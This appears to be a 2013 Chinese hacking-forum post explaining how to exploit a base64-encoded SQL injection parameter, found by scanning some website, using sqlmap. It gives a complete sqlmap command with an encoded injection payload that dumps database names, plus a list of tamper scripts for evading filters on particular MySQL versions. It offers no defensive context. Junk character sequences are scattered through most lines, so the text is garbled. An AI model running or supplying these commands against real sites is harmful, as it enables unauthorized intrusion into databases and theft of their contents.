找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2292|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
& V( F9 \9 g6 ^% Q' j$ V. [& _6 b) r) S0 w/ }
sqlmap的tamper里有个base64encode.py2 {2 z" ^6 u1 P4 B+ ~1 |
0 Z, }  u1 d: ?0 H* i- e5 ]6 _
使用如下
& y) Z) G. q4 L5 X: N7 x/ S: s$ [' j0 ?. o$ m( E; \
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
7 q" S( F* \' h
) T" ^) L+ |2 r, D3 z. B$ s. a, c5 E" F" n" L
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
+ \0 F: W- g5 e8 G7 ?* W% n8 l! H+ E1 E
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
' o& I% a' E$ x
$ k0 E- o8 l& T. y4 Jspace2hash.py ,对于MYSQL数据库 4.0, 5.0注入
3 h4 H4 A! L- Nspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入! N2 x+ H. H% `1 M
首先确定目标数据库版本,然后选择相应的脚本。
, T" m  M& X6 l2 n& {-v 3 --batch --tamper "space2hash.py"3 S4 l1 D  V' ]' ]& B# S& M

3 ]* n9 s* v+ H9 W. A' l还有其他一些插件:
1 ^9 M, g' M: n8 E. E& {encodes编码 ——charencode.py
: f' q% {$ d; q  {base64编码 —— base64encode.py
2 y3 K$ _5 \. C替换空格和关键字 —— halfversionedmorekeywords.py
; q( |1 V6 t: @# e& L/ b- k0 q

! E  }5 ?# @) `) {8 A6 W/ D" P# ]4 o
6 d5 L9 a2 N6 l) I, b6 I3 N
/ D0 }) S& }1 o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表